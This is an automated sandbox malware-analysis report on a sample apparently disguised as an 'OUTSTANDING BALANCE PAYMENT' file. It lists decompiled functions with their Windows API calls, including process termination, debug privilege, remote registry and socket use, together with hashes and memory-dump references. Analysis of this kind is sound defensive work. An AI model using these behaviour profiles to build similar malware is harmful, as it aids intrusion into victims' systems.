                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                  • String ID:
                                                                  • API String ID: 1268354404-0
                                                                  • Opcode ID: 80cbe9bafe7eaf17c6eb1c67dea2cae8ed80d289081084d36c1608d711a83309
                                                                  • Instruction ID: b012217568be0688836615afab245f1cdf8a60cdd19b5ef589c14b2a9856634f
                                                                  • Opcode Fuzzy Hash: 80cbe9bafe7eaf17c6eb1c67dea2cae8ed80d289081084d36c1608d711a83309
                                                                  • Instruction Fuzzy Hash: E5517E30620309EFDF21DF64CC92FAAB7F9AB18754F110529F94696290D7B0ECA0DB90
                                                                  Function 002C7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002C5FA6,?), ref: 002C6ED8
                                                                    • Part of subcall function 002C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002C5FA6,?), ref: 002C6EF1
                                                                    • Part of subcall function 002C72CB: GetFileAttributesW.KERNEL32(?,002C6019), ref: 002C72CC
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 002C75CA
                                                                  • _wcscmp.LIBCMT ref: 002C75E2
                                                                  • MoveFileW.KERNEL32(?,?), ref: 002C75FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 793581249-0
                                                                  • Opcode ID: 17c44beeeff10221d3a4cd58cf1135aa7a6464d8a80c47eb54d74894729c7686
                                                                  • Instruction ID: 83735f8a60db8aee2ec6c10d26c0ea8a334c3326b428fce6ec55c7f0d6a701bc
                                                                  • Opcode Fuzzy Hash: 17c44beeeff10221d3a4cd58cf1135aa7a6464d8a80c47eb54d74894729c7686
                                                                  • Instruction Fuzzy Hash: 965151B2A192195BDF50EF94D881EDE73BCAF08320F1041AEFA05E3041EA7496D9CF64
                                                                  Function 0029EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,002FDAD1,00000004,00000000,00000000), ref: 0029EAEB
                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,002FDAD1,00000004,00000000,00000000), ref: 0029EB32
                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,002FDAD1,00000004,00000000,00000000), ref: 002FDC86
                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,002FDAD1,00000004,00000000,00000000), ref: 002FDCF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: a20442bcba355fff62d01747dcf689c09caeaebe94ece15bf9f7c22452a25620
                                                                  • Instruction ID: 320fffc5d7741a2439e8bb07e2087178d53a3e6365e58551680cd311b503f49b
                                                                  • Opcode Fuzzy Hash: a20442bcba355fff62d01747dcf689c09caeaebe94ece15bf9f7c22452a25620
                                                                  • Instruction Fuzzy Hash: B4412C30235685DADF36CF288DADB3ABADABB41309F1B041EF18746961C6B1F860C711
                                                                  Function 002BB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,002BAEF1,00000B00,?,?), ref: 002BB26C
                                                                  • HeapAlloc.KERNEL32(00000000,?,002BAEF1,00000B00,?,?), ref: 002BB273
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002BAEF1,00000B00,?,?), ref: 002BB288
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,002BAEF1,00000B00,?,?), ref: 002BB290
                                                                  • DuplicateHandle.KERNEL32(00000000,?,002BAEF1,00000B00,?,?), ref: 002BB293
                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,002BAEF1,00000B00,?,?), ref: 002BB2A3
                                                                  • GetCurrentProcess.KERNEL32(002BAEF1,00000000,?,002BAEF1,00000B00,?,?), ref: 002BB2AB
                                                                  • DuplicateHandle.KERNEL32(00000000,?,002BAEF1,00000B00,?,?), ref: 002BB2AE
                                                                  • CreateThread.KERNEL32(00000000,00000000,002BB2D4,00000000,00000000,00000000), ref: 002BB2C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  • Opcode ID: d642a04056b438522afd4804fe6e80437e59c65b8cb224daa37b6f177edda1bb
                                                                  • Instruction ID: 852dd7e65e1d8c3dcf1de1ed886860b343de032109363ba6af4b94febc8f8dcb
                                                                  • Opcode Fuzzy Hash: d642a04056b438522afd4804fe6e80437e59c65b8cb224daa37b6f177edda1bb
                                                                  • Instruction Fuzzy Hash: 4C01C9B5241308BFEB11AFA5DC5DF6B7BECEB89711F058452FA05DB1A1CAB49800CB61
                                                                  Function 002DC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                  • API String ID: 0-572801152
                                                                  • Opcode ID: ce81467066de0905b0905e7e75d2a047ab16f3d9cae733937d77acc0ccbfa411
                                                                  • Instruction ID: add580a2e30b996da66121c9bfaa760356c442c745d5b892693d74e8dc4ba810
                                                                  • Opcode Fuzzy Hash: ce81467066de0905b0905e7e75d2a047ab16f3d9cae733937d77acc0ccbfa411
                                                                  • Instruction Fuzzy Hash: 52E1B571A2021B9BDF15DFA4D881EAEB7B9EF48314F24812AE905A7381D770ED51CF90
                                                                  Function 002D16DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                    • Part of subcall function 0029C6F4: _wcscpy.LIBCMT ref: 0029C717
                                                                  • _wcstok.LIBCMT ref: 002D184E
                                                                  • _wcscpy.LIBCMT ref: 002D18DD
                                                                  • _memset.LIBCMT ref: 002D1910
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                  • String ID: X$p23l23
                                                                  • API String ID: 774024439-4179860702
                                                                  • Opcode ID: 904264b3ce2799e44adb0f57fc39918fbe33e9142e074db0930ef65892678269
                                                                  • Instruction ID: 815e26836f2ab2496082fc381a9f74b17a3ee288a5014a0db9ee49918847ba0d
                                                                  • Opcode Fuzzy Hash: 904264b3ce2799e44adb0f57fc39918fbe33e9142e074db0930ef65892678269
                                                                  • Instruction Fuzzy Hash: FEC18E355253419FC724EF24C895A9AB7E4BF85354F14492EF89A973A2DB30EC24CF82
                                                                  Function 002E9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002E9B19
                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 002E9B2D
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002E9B47
                                                                  • _wcscat.LIBCMT ref: 002E9BA2
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 002E9BB9
                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002E9BE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcscat
                                                                  • String ID: SysListView32
                                                                  • API String ID: 307300125-78025650
                                                                  • Opcode ID: 2ba94dd8490021c9509f8e43c299c2a98526945fa410506311f73106b0e0f178
                                                                  • Instruction ID: fa132cd289d732215ea356c463db1d559b0eddcd8b73b7548c859fbf284a2272
                                                                  • Opcode Fuzzy Hash: 2ba94dd8490021c9509f8e43c299c2a98526945fa410506311f73106b0e0f178
                                                                  • Instruction Fuzzy Hash: 5441FE70950349ABDB22DFA4CC85BEE77E8EF08350F50042BF549A7292D6719DD4CB60
                                                                  Function 002E172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002C6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002C6554
                                                                    • Part of subcall function 002C6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 002C6564
                                                                    • Part of subcall function 002C6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 002C65F9
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002E179A
                                                                  • GetLastError.KERNEL32 ref: 002E17AD
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002E17D9
                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 002E1855
                                                                  • GetLastError.KERNEL32(00000000), ref: 002E1860
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002E1895
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 2533919879-2896544425
                                                                  • Opcode ID: 2c7f06c8abe9dc2137a381cf6e7020b5e3e239bda0a505409a76c4aab92cfdc7
                                                                  • Instruction ID: 4e415e80b23f6b04f3a77a48cbebbec2d55e092de14d0a4b6bcba8c888e5e966
                                                                  • Opcode Fuzzy Hash: 2c7f06c8abe9dc2137a381cf6e7020b5e3e239bda0a505409a76c4aab92cfdc7
                                                                  • Instruction Fuzzy Hash: 2141BF75660201AFDB06EF94C8A5F6DB7A5AF04710F0580ADF9069F2C2DBB4E9248F91
                                                                  Function 002C5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 002C58B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoad
                                                                  • String ID: blank$info$question$stop$warning
                                                                  • API String ID: 2457776203-404129466
                                                                  • Opcode ID: db7bc0b6cb46a1495ce5e6e3b519fe8edb21b8d1cc677b2d9cc9496c0ce46329
                                                                  • Instruction ID: 2fc438386182ec5ce0f7c8dc6ff36ca9068e62683e3580a3a896ae6e608e2d2f
                                                                  • Opcode Fuzzy Hash: db7bc0b6cb46a1495ce5e6e3b519fe8edb21b8d1cc677b2d9cc9496c0ce46329
                                                                  • Instruction Fuzzy Hash: 2811E735229B53BFE7015E559CC2EAA239C9F16320F20023EF500E6281EBA4FAE04664
                                                                  Function 002CA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 002CA806
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafeVartype
                                                                  • String ID:
                                                                  • API String ID: 1725837607-0
                                                                  • Opcode ID: a661eaeced07c3bdca8fe9ca8efe191ddd4fe39d1c0ace957ad54dce4ba875c9
                                                                  • Instruction ID: 6ed40a004dca209eaff8211edd2856d2a0188846a3094f3894e1671037b3eea5
                                                                  • Opcode Fuzzy Hash: a661eaeced07c3bdca8fe9ca8efe191ddd4fe39d1c0ace957ad54dce4ba875c9
                                                                  • Instruction Fuzzy Hash: 1DC17875A2120A9FDB00CF98D495BAEB7F4FF08319F20816EE606E7241D774AA51CF91
                                                                  Function 002C6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002C6B63
                                                                  • LoadStringW.USER32(00000000), ref: 002C6B6A
                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002C6B80
                                                                  • LoadStringW.USER32(00000000), ref: 002C6B87
                                                                  • _wprintf.LIBCMT ref: 002C6BAD
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002C6BCB
                                                                  Strings
                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 002C6BA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                  • API String ID: 3648134473-3128320259
                                                                  • Opcode ID: c34d47b621098bbd0a6efa096340dd234ebd5cbbee7a57edfce054edf396f103
                                                                  • Instruction ID: 80f5ed4aee5ca9cfa3ed6e928bff0d6f8dd40448a43947fddaa93fb92919a102
                                                                  • Opcode Fuzzy Hash: c34d47b621098bbd0a6efa096340dd234ebd5cbbee7a57edfce054edf396f103
                                                                  • Instruction Fuzzy Hash: 360131F6900218BFEB52ABE49D89FF777ACD708304F0045A6B746E2041EA749E848F75
                                                                  Function 002E2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E2BB5,?,?), ref: 002E3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E2BF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharConnectRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 2595220575-0
                                                                  • Opcode ID: b47d602b143353e89827442ddb88f9e5e8a91bac3efbfcdd011018e9a5a37200
                                                                  • Instruction ID: ab9576020923af3eafce1e9555dfdf55382ef52a6292c3ce1f13d6ec723e1df1
                                                                  • Opcode Fuzzy Hash: b47d602b143353e89827442ddb88f9e5e8a91bac3efbfcdd011018e9a5a37200
                                                                  • Instruction Fuzzy Hash: 3C919935215201DFCB01EF55C891B6EB7E9BF88310F58885EF986972A1DB30E929CF42
                                                                  Function 002D95BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WSOCK32 ref: 002D9691
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D969E
                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 002D96C8
                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002D96E9
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D96F8
                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 002D97AA
                                                                  • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0031DC00), ref: 002D9765
                                                                    • Part of subcall function 002BD2FF: _strlen.LIBCMT ref: 002BD309
                                                                  • _strlen.LIBCMT ref: 002D9800
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                  • String ID:
                                                                  • API String ID: 3480843537-0
                                                                  • Opcode ID: c0f08f2d37a084fecd997c4fa5a3052593264a2502f70549604da82306f19003
                                                                  • Instruction ID: 7c91be2e2c9b001ebccb726dc3f546adc48b7e488fc9d046c77c50d15b3a6379
                                                                  • Opcode Fuzzy Hash: c0f08f2d37a084fecd997c4fa5a3052593264a2502f70549604da82306f19003
                                                                  • Instruction Fuzzy Hash: 1881EE31524201ABC710EF64CC95E6BB7E8EF85B18F104A1EF5559B2D2EB30DD24CBA2
                                                                  Function 002AA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __mtinitlocknum.LIBCMT ref: 002AA991
                                                                    • Part of subcall function 002A7D7C: __FF_MSGBANNER.LIBCMT ref: 002A7D91
                                                                    • Part of subcall function 002A7D7C: __NMSG_WRITE.LIBCMT ref: 002A7D98
                                                                    • Part of subcall function 002A7D7C: __malloc_crt.LIBCMT ref: 002A7DB8
                                                                  • __lock.LIBCMT ref: 002AA9A4
                                                                  • __lock.LIBCMT ref: 002AA9F0
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00336DE0,00000018,002B5E7B,?,00000000,00000109), ref: 002AAA0C
                                                                  • EnterCriticalSection.KERNEL32(8000000C,00336DE0,00000018,002B5E7B,?,00000000,00000109), ref: 002AAA29
                                                                  • LeaveCriticalSection.KERNEL32(8000000C), ref: 002AAA39
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 1422805418-0
                                                                  • Opcode ID: d03a52faa8a19a7a0beb433d1a05100ab607f3a37995acf3b81aff2a7bc75933
                                                                  • Instruction ID: 3144d2088a694c2eb54670f739412c7a7d7522f79e60ddb5ed18cf42aab94808
                                                                  • Opcode Fuzzy Hash: d03a52faa8a19a7a0beb433d1a05100ab607f3a37995acf3b81aff2a7bc75933
                                                                  • Instruction Fuzzy Hash: AC413871A206029BEB14DF68DA4575CB7F4AF03334F148219E525AB2E3DFB49860CF92
                                                                  Function 002E8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 002E8EE4
                                                                  • GetDC.USER32(00000000), ref: 002E8EEC
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002E8EF7
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 002E8F03
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 002E8F3F
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002E8F50
